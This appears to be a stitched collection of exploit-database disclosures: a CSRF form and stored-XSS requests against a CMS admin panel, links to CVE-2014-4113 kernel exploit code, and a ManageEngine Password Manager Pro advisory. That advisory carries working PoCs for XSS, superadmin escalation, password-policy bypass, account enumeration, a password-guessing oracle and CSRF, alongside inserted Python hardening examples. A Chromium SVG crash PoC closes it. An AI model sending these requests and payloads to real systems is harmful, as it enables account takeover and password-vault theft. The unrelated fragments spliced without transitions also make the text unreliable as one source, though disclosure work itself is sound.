      <input type="hidden" name="usergroups" value="Support&#32;Ticket&#32;Users" />
      <input type="hidden" name="usergroups" value="User&#32;Managers" />
      <input type="hidden" name="usergroups" value="Website&#32;Administrators" />
      <input type="hidden" name="usergroups" value="Website&#32;Developers" />
      <input type="hidden" name="users&#95;group" value="" />
      <input type="hidden" name="users&#95;type" value="" />
      <input type="hidden" name="creators&#95;group" value="" />
      <input type="hidden" name="creators&#95;type" value="" />
      <input type="hidden" name="editors&#95;group" value="" />
      <input type="hidden" name="editors&#95;type" value="" />
      <input type="hidden" name="publishers&#95;group" value="" />
      <input type="hidden" name="publishers&#95;type" value="" />
      <input type="hidden" name="administrators&#95;group" value="" />
      <input type="hidden" name="administrators&#95;type" value="" />
      <input type="hidden" name="scheduled&#95;publish" value="2016&#45;03&#45;13&#32;00&#58;00" />
      <input type="hidden" name="scheduled&#95;publish&#95;email" value="" />
      <input type="hidden" name="scheduled&#95;notify" value="" />
      <input type="hidden" name="scheduled&#95;notify&#95;email" value="" />
      <input type="hidden" name="scheduled&#95;unpublish" value="" />
      <input type="hidden" name="scheduled&#95;unpublish&#95;email" value="" />
      <input type="hidden" name="invoice&#95;name" value="Icebreaker" />
      <input type="hidden" name="invoice&#95;organisation" value="Zero&#32;Science&#32;Lab" />
      <input type="hidden" name="invoice&#95;address" value="nu" />
      <input type="hidden" name="invoice&#95;postalcode" value="1300" />
      <input type="hidden" name="invoice&#95;city" value="Neverland" />
      <input type="hidden" name="invoice&#95;state" value="ND" />
      <input type="hidden" name="invoice&#95;country" value="ND" />
      <input type="hidden" name="invoice&#95;phone" value="111&#45;222&#45;3333" />
      <input type="hidden" name="invoice&#95;fax" value="" />
      <input type="hidden" name="invoice&#95;email" value="lab&#64;zeroscience&#46;tld" />
      <input type="hidden" name="invoice&#95;website" value="www&#46;zeroscience&#46;mk" />
      <input type="hidden" name="delivery&#95;name" value="" />
      <input type="hidden" name="delivery&#95;organisation" value="" />
      <input type="hidden" name="delivery&#95;address" value="" />
      <input type="hidden" name="delivery&#95;postalcode" value="" />
      <input type="hidden" name="delivery&#95;city" value="" />
      <input type="hidden" name="delivery&#95;state" value="" />
      <input type="hidden" name="delivery&#95;country" value="" />
      <input type="hidden" name="delivery&#95;phone" value="" />
      <input type="hidden" name="delivery&#95;fax" value="" />
      <input type="hidden" name="delivery&#95;email" value="" />
      <input type="hidden" name="delivery&#95;website" value="" />
      <input type="hidden" name="card&#95;type" value="VISA" />
      <input type="hidden" name="card&#95;number" value="4444333322221111" />
      <input type="hidden" name="card&#95;issuedmonth" value="01" />
      <input type="hidden" name="card&#95;issuedyear" value="2016" />
      <input type="hidden" name="card&#95;expirymonth" value="01" />
      <input type="hidden" name="card&#95;expiryyear" value="2100" />
      <input type="hidden" name="card&#95;name" value="Hacker&#32;Hackerowsky" />
      <input type="hidden" name="card&#95;cvc" value="133" />
      <input type="hidden" name="card&#95;issue" value="" />
      <input type="hidden" name="card&#95;postalcode" value="1300" />
      <input type="hidden" name="content&#95;editor" value="" />
      <input type="hidden" name="hardcore&#95;upload" value="" />
      <input type="hidden" name="hardcore&#95;format" value="" />
      <input type="hidden" name="hardcore&#95;width" value="" />
      <input type="hidden" name="hardcore&#95;height" value="" />
      <input type="hidden" name="hardcore&#95;onenter" value="" />
      <input type="hidden" name="hardcore&#95;onctrlenter" value="" />
      <input type="hidden" name="hardcore&#95;onshiftenter" value="" />
      <input type="hidden" name="hardcore&#95;onaltenter" value="" />
      <input type="hidden" name="hardcore&#95;toolbar1" value="" />
      <input type="hidden" name="hardcore&#95;toolbar2" value="" />
      <input type="hidden" name="hardcore&#95;toolbar3" value="" />
      <input type="hidden" name="hardcore&#95;toolbar4" value="" />
      <input type="hidden" name="hardcore&#95;toolbar5" value="" />
      <input type="hidden" name="hardcore&#95;formatblock" value="" />
      <input type="hidden" name="hardcore&#95;fontname" value="" />
      <input type="hidden" name="hardcore&#95;fontsize" value="" />
      <input type="hidden" name="hardcore&#95;customscript" value="" />
      <input type="hidden" name="startpage" value="" />
      <input type="hidden" name="workspace&#95;sections" value="" />
      <input type="hidden" name="index&#95;workspace" value="" />
      <input type="hidden" name="index&#95;content" value="" />
      <input type="hidden" name="index&#95;library" value="" />
      <input type="hidden" name="index&#95;product" value="" />
      <input type="hidden" name="index&#95;stock" value="" />
      <input type="hidden" name="index&#95;order" value="" />
      <input type="hidden" name="index&#95;segments" value="" />
      <input type="hidden" name="index&#95;usertests" value="" />
      <input type="hidden" name="index&#95;heatmaps" value="" />
      <input type="hidden" name="index&#95;user" value="" />
      <input type="hidden" name="index&#95;websites" value="" />
      <input type="hidden" name="menu&#95;selection" value="" />
      <input type="hidden" name="statistics&#95;reports" value="" />
      <input type="hidden" name="sales&#95;reports" value="" />
      <input type="submit" value="Initiate" />
    </form>
  </body>
</html>


#4
Stored Cross-Site Scripting:
----------------------------

a)


POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
Host: 10.0.0.7

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="webeditor_stylesheet"

/stylesheet.jsp?id=1,1&device=&useragent=&
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="restore"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="archive"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publish"

Save & Publish
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_publish"

2016-03-09 13:29
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_unpublish"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="checkedout"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="revision"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="title"

"><script>alert(document.cookie)</script>
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="searchable"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="menuitem"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml

testsvgxxefailed
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file_data"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="server_filename"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentdelivery"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image1"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image2"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image3"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfo"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentation"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="author"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="description"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="keywords"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfoname"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationname"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationvalue"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentpackage"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentclass"

image
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentgroup"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contenttype"

Photos
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version_master"

0
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="device"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usersegment"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usertest"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_top"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_up"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_previous"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_next"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_first"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_last"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="related"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="selectrelated"


------WebKitFormBoundarygqlN2AtccVFqx0YN--


b)

POST /webadmin/fileformats/create_post.jsp HTTP/1.1
Host: 10.0.0.7

filenameextension="><script>alert(document.cookie)</script>
            
Sources:
https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf
https://github.com/sam-b/CVE-2014-4113

EDB Mirror: https://www.exploit-db.com/docs/english/39665-windows-kernel-exploitation-101-exploiting-cve-2014-4113.pdf


Trigger and exploit code for CVE-2014-4113:

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39666.zip
            
[Systems Affected]
   Product : ManageEngine Password Manager Pro
   Company : ZOHO Corp.
   Build Number : 8.1 to 8.3 and probably earlier versions
   Affected Versions : 8102 to 8302 and probably earlier versions


[Product Description]
   Password Manager Pro is a secure vault for storing and managing
shared sensitive information such as passwords, documents and digital
identities of enterprises.


[Vulnerabilities]
   Multiple vulnerabilities were identified within this application:
   1- Stored XSS in /AddMail.ve
   2- Privilege escalation in /EditUser.do
   3- Business Logic Bypass in /EditUser.do
   4- Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
   5- Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
   6- Resource's user enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp
   7- Password Bruteforce for resources accounts in
/jsp/xmlhttp/AjaxResponse.jsp
   8- Cross-Site Request Forgery


[Advisory Timeline]
   17/07/2015 - Discovery and vendor notification
   17/07/2015 - ManageEngine responded that they would notify their
development team
   13/10/2015 - ManageEngine informed that they had fixed these issues
   14/10/2015 - Fixed Password Manager Pro build version 8300 was released
   15/10/2015 - Testing on beta build version 8300 was performed and
confirmed the fix of issues 2, 4, 7 and part of issue 8
   02/11/2015 - ManageEngine asked for more time to fix the remaining issues
before making this public
   29/12/2015 - ManageEngine contacted for an update - No reply
   12/01/2016 - ManageEngine contacted for an update - No reply
   08/02/2016 - ManageEngine contacted for an update - small update provided
   12/02/2016 - Last communication from ManageEngine
   04/04/2016 - Public Disclosure


[Patch Available]
   Password Manager Pro Release 8.3 (8300) (released October 2015)
fixes issues #2, #4, #7 and partially #8
   Password Manager Pro Release 8.3 (8303) (released December 2015)
fixes issues #1, #3, #5 and #6


[Exploit]
   There is an exploit available that takes advantage of the Privilege
Escalation vulnerability (Issue #2): it elevates a regular user to
SuperAdmin and then downloads the passwords and files stored within
the application. The exploit code is available here:
   - https://github.com/s3bap3/pmp-exploit


[Description of Vulnerabilities]

(1) Stored XSS in /AddMail.ve.
   This functionality is under the personal accounts stored in the
application. However, as the page is also vulnerable to CSRF, an HTML
form can be forged to create a personal account and exploit the XSS
vulnerability. The affected parameter is "password", and the POST
message to send is something like this:

   [PoC]
      POST /AddMail.ve?SUBREQUEST=XMLHTTP HTTP/1.1

      service=1&serviceurl=1&loginname=1&password=<!--+--+--><script>alert%28'XSS'%29;<%2fscript><!--+--+-->&spassword=&tags=1&Rule=Low&FORWARDURL=MailAccount.cc%3F


(2) Privilege escalation in /EditUser.do, which allows two things.
   a- Hijack users' sessions by changing their email addresses and using
the forgot-password functionality.
   The affected parameter is "EMAIL" from the /EditUser.do web page.
Any user (even one with the PASSWORD USER role) can send a crafted POST
request like the one below in order to change a user's email address,
which is used to generate a new password when the previous one is
forgotten. The only attribute that needs to be changed from one
request to another is the LOGINID, which is a sequence number that
represents the user's numeric ID.

   b- Escalate privileges by changing the user account status from
Password User to superadmin.
   By forging a similar request it is possible to raise our own
privileges and become a privileged user. For example, the parameter
"ROLE" can be changed to "Password Auditor", "Password Administrator"
or even "Administrator", and the account takes on that role. It is also
possible to become a superAdmin by changing the parameter "superAdmin"
from false to true. This allows us to take control of the application
and all the passwords stored on it. In order to become superAdmin, the
user role needs to be Administrator. Both can be achieved by forging
the same request. In this scenario there are two parameters to be aware
of:
   - USERID and LOGINID are the numeric account ID to which the
superadmin attribute will be granted (this can be obtained from the
login reply)
   - USER is the username to which the superadmin attribute will be granted

   [PoC]
      POST /EditUser.do?SUBREQUEST=true HTTP/1.1
      Content-Type: multipart/form-data;
boundary=---------------------------20780287114832

      -----------------------------20780287114832
      Content-Disposition: form-data; name="isloginusersa"

      false
      -----------------------------20780287114832
      Content-Disposition: form-data; name="superadminscope"

      true
      -----------------------------20780287114832
      Content-Disposition: form-data; name="SERVERPORT"

      7272
      -----------------------------20780287114832
      Content-Disposition: form-data; name="OLDROLE"

      Administrator
      -----------------------------20780287114832
      Content-Disposition: form-data; name="USERID"

      4
      -----------------------------20780287114832
      Content-Disposition: form-data; name="LOGINID"

      4
      -----------------------------20780287114832
      Content-Disposition: form-data; name="USER"

      username
      -----------------------------20780287114832
      Content-Disposition: form-data; name="OLDLANG"

      en
      -----------------------------20780287114832
      Content-Disposition: form-data; name="EMAIL"

      pwned@user.com
      -----------------------------20780287114832
      Content-Disposition: form-data; name="ROLE"

      Administrator
      -----------------------------20780287114832
      Content-Disposition: form-data; name="superAdmin"

      true
      -----------------------------20780287114832
      Content-Disposition: form-data; name="Rule"

      Strong
      -----------------------------20780287114832
      Content-Disposition: form-data; name="DEPT"


      -----------------------------20780287114832
      Content-Disposition: form-data; name="LOCATION"


      -----------------------------20780287114832
      Content-Disposition: form-data; name="mobileaccess"

      enable
      -----------------------------20780287114832
      Content-Disposition: form-data; name="UserCert"; filename=""
      Content-Type: application/octet-stream


      -----------------------------20780287114832
      Content-Disposition: form-data; name="lang_code"

      en
      -----------------------------20780287114832--


(3) Business Logic Bypass in /EditUser.do
   The application only allows the creation of a certain number of
Administrators, based on the licence. However, it is possible to create
more administrators. To do so, go to the user administration page and
edit a user. Save the edit without making any modification and
intercept that POST message. Set both parameters "OLDROLE" and "ROLE"
to the role "Administrator", and the user's role will be changed to it.
Every user can be converted to an administrator even if the licence
does not allow that many. The application only checks the number of
administrators when "ROLE" is Administrator but "OLDROLE" is another
role.
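The two /EditUser.do issues above (2 and 3), modelled in Python as an added example that is not ManageEngine's code: a handler that takes the target account, ROLE, superAdmin and the "old role" for the licence check from the form, beside one that derives the target, the previous role and the administrator count from server-side state. The user store, the licence limit, the refusal messages and the fixture users are constructed; only the field names and the "Password User"/"Administrator" roles come from the advisory.

```python
from dataclasses import dataclass, field

ROLES = {"Password User", "Password Auditor", "Password Administrator", "Administrator"}


@dataclass
class User:
    login_id: int
    name: str
    email: str
    role: str
    super_admin: bool = False


@dataclass
class UserStore:
    users: dict = field(default_factory=dict)
    admin_licences: int = 2  # constructed licence limit for Administrator accounts

    def admin_count(self):
        return sum(1 for u in self.users.values() if u.role == "Administrator")


class Forbidden(Exception):
    pass


def edit_user_vulnerable(store, request):
    """Models the flawed handler: the target account, the new ROLE/superAdmin
    and the 'old role' used for the licence check all come from the form."""
    target = store.users[int(request["LOGINID"])]
    if request["ROLE"] == "Administrator" and request["OLDROLE"] != "Administrator":
        if store.admin_count() >= store.admin_licences:
            raise Forbidden("licence limit reached")
    target.email = request["EMAIL"]
    target.role = request["ROLE"]
    target.super_admin = request["superAdmin"] == "true"
    return target


def edit_user_hardened(store, caller_id, request):
    """Derives every trust decision from the caller's session and the stored record."""
    caller = store.users[caller_id]
    target = store.users[int(request["LOGINID"])]
    caller_is_admin = caller.role == "Administrator"

    # Issue 2a: only the account owner or an administrator may change EMAIL.
    if target.login_id != caller.login_id and not caller_is_admin:
        raise Forbidden("cannot edit another user's account")

    new_role = request["ROLE"]
    want_super = request["superAdmin"] == "true"
    if new_role not in ROLES:
        raise Forbidden("unknown role")

    # Issue 2b: nobody may raise their own privileges, only an administrator may
    # change someone else's, and superAdmin is granted only by a superadmin and
    # only to an Administrator account.
    if new_role != target.role or want_super != target.super_admin:
        if target.login_id == caller.login_id or not caller_is_admin:
            raise Forbidden("privilege change not permitted")
        if want_super and (not caller.super_admin or new_role != "Administrator"):
            raise Forbidden("superAdmin requires a superadmin caller and Administrator role")

    # Issue 3: the previous role is the stored one. OLDROLE from the form is never
    # consulted, so sending OLDROLE=Administrator cannot skip the licence check.
    if new_role == "Administrator" and target.role != "Administrator":
        if store.admin_count() >= store.admin_licences:
            raise Forbidden("licence limit reached")

    target.email = request["EMAIL"]
    target.role = new_role
    target.super_admin = want_super
    return target


def attempt(store, caller_id, request):
    """Runs the hardened handler; returns None on success or the refusal reason."""
    try:
        edit_user_hardened(store, caller_id, request)
        return None
    except Forbidden as exc:
        return str(exc)


def sample_store():
    """Constructed fixture: a superadmin, a plain administrator, a Password User (id 4)."""
    store = UserStore()
    store.users[1] = User(1, "root", "root@example.test", "Administrator", True)
    store.users[2] = User(2, "ops", "ops@example.test", "Administrator")
    store.users[4] = User(4, "username", "user@example.test", "Password User")
    return store


# The advisory's PoC request, reduced to the fields the handlers read.
ESCALATION_REQUEST = {"LOGINID": "4", "USER": "username", "EMAIL": "pwned@user.com",
                      "OLDROLE": "Administrator", "ROLE": "Administrator", "superAdmin": "true"}
```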


(4) Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
   Every time a password for a user account or a resource's user account
is changed, a request is sent to this path in order to validate the
password against the password policy. Apart from the fact that the
password is sent in the URL (which means it can be logged by any proxy
or even by the browser), the policy the password is evaluated against
can be changed by modifying the parameter "Rule" from its current value
to "Low", so that the password is evaluated against a weaker policy.
For example:

   [PoC]
      https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&ACCID=5
      https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&AccName=5


(5) Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
   When an administrator creates a Password Reset Listener, another
administrator needs to approve it. The same happens when a Listener
needs to be suspended. However, this can be bypassed: the same
administrator can create and approve the listener by forging a GET
request like the following. The only parameter that needs to be
changed is "LISTENERID", which is a sequence number that represents
the Listener.

   [PoC]
      Listener Approval
      https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=false&LISTENERTYPE=1&SUBREQUEST=XMLHTTP

      Listener Suspension
      https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=true&LISTENERTYPE=1&SUBREQUEST=XMLHTTP


(6) Resource's user enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp.
   It is possible to enumerate a resource's user accounts by forging a
GET request as follows. This URL allows a user who has access to
retrieve the account password. However, if the user does not have
access, the error message differs depending on whether the account
exists or not. The only parameters that need to be modified are
"Resource" and "Account".

   [PoC]
      https://192.168.56.101:7272/jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp?RequestType=PasswordRetrived&resource=admin+resource&account=admin

      The error message identifies whether the account exists for that resource.
      Account exists: ____ACCESS___DENIED__
      Resource/Account does not exist: FAILURE


(7) Password Bruteforce for resource accounts in /jsp/xmlhttp/AjaxResponse.jsp
   It is possible to enumerate a resource's user passwords by forging a
GET request as follows. This URL is used to validate a user password
against the specified password policy. Being able to change the
password policy, it is possible to use the "Low" policy, which does
not allow reusing the password currently set for the user. If an
error message appears saying that the password cannot be reused, that
indicates that the password is the current password for that account.
   The only parameters that need to be modified are "Password" and
"ACCID"; also ensure that the password policy "Rule" parameter is set
to Low.

   [PoC]
      https://192.168.56.101:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=2&Rule=Low&ACCID=8

      The error message identifies whether the password is correct or not
for every user account.
      Password matches: "Password cannot be same as last 1 passwords"
      Password does not match: "SUCCESS"
      Account ID does not exist: "Error in validating password policy"
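Issues 4, 6 and 7 share one root cause, so one added Python example (not ManageEngine's code) covers all three: a validPassword/PasswordRetrived pair in which the policy comes from the stored account (the client's Rule parameter is accepted but ignored), the authorisation check runs before any check that depends on account state, and an unknown account and an account the caller may not touch produce the same response, so neither account existence nor the current password leaks. Policy definitions, account data, owner ids and the hashing parameters are constructed; the response strings quoted from the advisory are reused where the hardened endpoint would legitimately return them to an authorised caller.

```python
import hashlib
import hmac
import re
from dataclasses import dataclass, field

# Constructed policy set; the product's real rule definitions are not on the page.
POLICIES = {
    "Low":    {"min_len": 1, "classes": 0, "history": 0},
    "Strong": {"min_len": 8, "classes": 3, "history": 1},
}
# A single answer for "no such account" and "not your account". The oracle in
# issues 6 and 7 exists only because those two cases produced different strings.
GENERIC_FAILURE = "FAILURE"


def pw_hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


@dataclass
class Account:
    acc_id: int
    resource: str
    name: str
    policy: str      # the policy is a property of the account, never of the request
    owners: set      # user ids allowed to view or change this account (constructed)
    secret: str
    salt: bytes = b"constructed-salt"
    history: list = field(default_factory=list)  # hashes of previous passwords


def check_policy(password, policy):
    """Stateless strength rules; detailed feedback is fine for an authorised caller."""
    if len(password) < policy["min_len"]:
        return "Password too short"
    classes = sum(bool(re.search(p, password)) for p in (r"[a-z]", r"[A-Z]", r"\d", r"\W"))
    if classes < policy["classes"]:
        return "Password needs more character classes"
    return "SUCCESS"


def valid_password(accounts, caller_id, acc_id, password, rule_param=None):
    """Hardened validPassword. rule_param stands for the client's Rule and is ignored
    (issue 4); the history comparison runs only for an authorised caller (issue 7).
    In a real deployment the password would also travel in a POST body, not the URL."""
    acct = accounts.get(acc_id)
    if acct is None or caller_id not in acct.owners:
        return GENERIC_FAILURE
    policy = POLICIES[acct.policy]
    verdict = check_policy(password, policy)
    if verdict != "SUCCESS":
        return verdict
    candidate = pw_hash(password, acct.salt)
    recent = acct.history[-policy["history"]:] if policy["history"] else []
    if any(hmac.compare_digest(candidate, old) for old in recent):
        return f"Password cannot be same as last {policy['history']} passwords"
    return "SUCCESS"


def retrieve_password(accounts, caller_id, resource, account_name):
    """Hardened PasswordRetrived: an existing account the caller may not read
    answers exactly like a non-existent one (issue 6)."""
    for acct in accounts.values():
        if (acct.resource == resource and acct.name == account_name
                and caller_id in acct.owners):
            return acct.secret
    return GENERIC_FAILURE


def sample_accounts():
    """Constructed fixture: account 5 ('admin' on 'admin resource') owned by user 1."""
    acct = Account(5, "admin resource", "admin", "Strong", {1}, secret="Sup3rSecret!")
    acct.history.append(pw_hash(acct.secret, acct.salt))  # current password is in history
    return {5: acct}
```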


(8) Cross-Site Request Forgery
   The application is vulnerable to Cross-Site Request Forgery: by
sending specific POST messages it is possible to create a user in the
system (1), elevate privileges for a user (2)(4), and store an XSS in
the user's personal passwords (3). Below are the PoCs.

   [PoC]
      User Creation
      <html>
         <body>
            <form method="post"
action="https://192.168.0.3:7272/AddUser.do"
enctype="multipart/form-data">
               <input value="true" name="superadminscope"
type="hidden"><input value="true" type="hidden">
               <input value="true" name="isloginusersa"
type="hidden"><input value="true" type="hidden">
               <input value="hacker" name="fname" type="hidden"><input
value="true" type="hidden">
               <input value="hacker" name="lname" type="hidden"><input
value="true" type="hidden">
               <input value="hacker" name="user" type="hidden"><input
value="true" type="hidden">
               <input value="same" name="rbutton" type="hidden"><input
value="true" type="hidden">
               <input value="Strong" name="Rule" type="hidden"><input
value="true" type="hidden">
               <input value="" name="spassword" type="hidden"><input
value="true" type="hidden">
               <input value="hacker@hacker.com" name="mail"
type="hidden"><input value="true" type="hidden">
               <input value="Password User" name="ROLE"
type="hidden"><input value="true" type="hidden">
               <input value="false" name="superAdmin"
type="hidden"><input value="true" type="hidden">
               <input value="" name="dept" type="hidden"><input
value="true" type="hidden">
               <input value="false" name="location"
type="hidden"><input value="true" type="hidden">
               <input value="enable" name="mobileaccess"
type="hidden"><input value="true" type="hidden">
               <input value="en" name="lang_code" type="hidden"><input
value="true" type="hidden">
               <input type="submit" value="Submit">
            </form>
         </body>
      </html>

      Privilege Escalation
      <html>
         <body>
            <form method="post"
action="https://192.168.0.3:7272/EditUser.do?SUBREQUEST=true"
enctype="multipart/form-data">
               <input value="true" name="isloginusersa"
type="hidden"><input value="true" type="hidden">
               <input value="true" name="superadminscope"
type="hidden"><input value="true" type="hidden">
               <input value="Administrator" name="OLDROLE"
type="hidden"><input value="true" type="hidden">
               <input value="613" name="USERID" type="hidden"><input
value="true" type="hidden">
               <input value="613" name="LOGINID" type="hidden"><input
value="true" type="hidden">
               <input value="hacker" name="USER" type="hidden"><input
value="true" type="hidden">
               <input value="en" name="OLDLANG" type="hidden"><input
value="true" type="hidden">
               <input value="hacker@hacker.com" name="EMAIL"
type="hidden"><input value="true" type="hidden">
               <input value="Administrator" name="ROLE"
type="hidden"><input value="true" type="hidden">
               <input value="true" name="superAdmin"
type="hidden"><input value="true" type="hidden">
               <input value="Strong" name="Rule" type="hidden"><input
value="true" type="hidden">
               <input value="" name="DEPT" type="hidden"><input
value="true" type="hidden">
               <input value="" name="LOCATION" type="hidden"><input
value="true" type="hidden">
               <input value="enable" name="mobileaccess"
type="hidden"><input value="true" type="hidden">
               <input value="en" name="lang_code" type="hidden"><input
value="true" type="hidden">
               <input type="submit" value="Submit">
            </form>
         </body>
      </html>

      Stored XSS
      <html>
         <body>
            <form name="badform" method="post"
action="https://192.168.0.3:7272/AddMail.ve?SUBREQUEST=XMLHTTP"
accept-charset="UTF-8">
               <input type="hidden" name="service" value="1" />
               <input type="hidden" name="serviceurl" value="1" />
               <input type="hidden" name="loginname" value="1" />
               <input type="hidden" name="password" value="<!-- --
--><script>alert('XSS');</script><!-- -- -->" />
               <input type="hidden" name="spassword" value="" />
               <input type="hidden" name="tags" value="" />
               <input type="hidden" name="Rule" value="Low" />
               <input type="submit" value="Submit">
            </form>
         </body>
      </html>

      Privilege Escalation
      <html>
         <body>
            <form name="badform" method="post"
action="https://192.168.0.3:7272/ChangeRoles.ve?SUBREQUEST=XMLHTTP"
accept-charset="UTF-8">
               <input type="hidden" name="SKIP_PREF" value="true" />
               <input type="hidden" name="Admin" value="hacker" />
               <input type="hidden" name="FORWARDURL"
value="UserTabView.cc%3F" />
               <input type="submit" value="Submit">
            </form>
         </body>
      </html>

--
S3ba
@s3bap3
http://linkedin.com/in/s3bap3
            
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=691

Minimized PoC:
-->

<svg xmlns="http://www.w3.org/2000/svg" xlink="http://www.w3.org/1999/xlink">
<pattern id="outer"><rect id="rect"><pattern id="inner"></pattern></rect></pattern>
<script><![CDATA[
  function handler() {
    inner.setAttribute("viewBox");
  }
  outer.addEventListener("DOMAttrModified", function () { handler(); });
  doc = document.implementation.createDocument("", "", null);
  doc.adoptNode(rect.attributes[0]);
]]></script>
</svg>

<!--
Backtrace for reference:

2:052:x86> k 10
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0bb14b64 6ad180b8 vrfcore!VerifierStopMessageEx+0x571
0bb14b88 67fec434 vrfcore!VerifierDisableVerifier+0x748
0bb14bdc 67fea3dc verifier_67fe0000!VerifierStopMessage+0x74
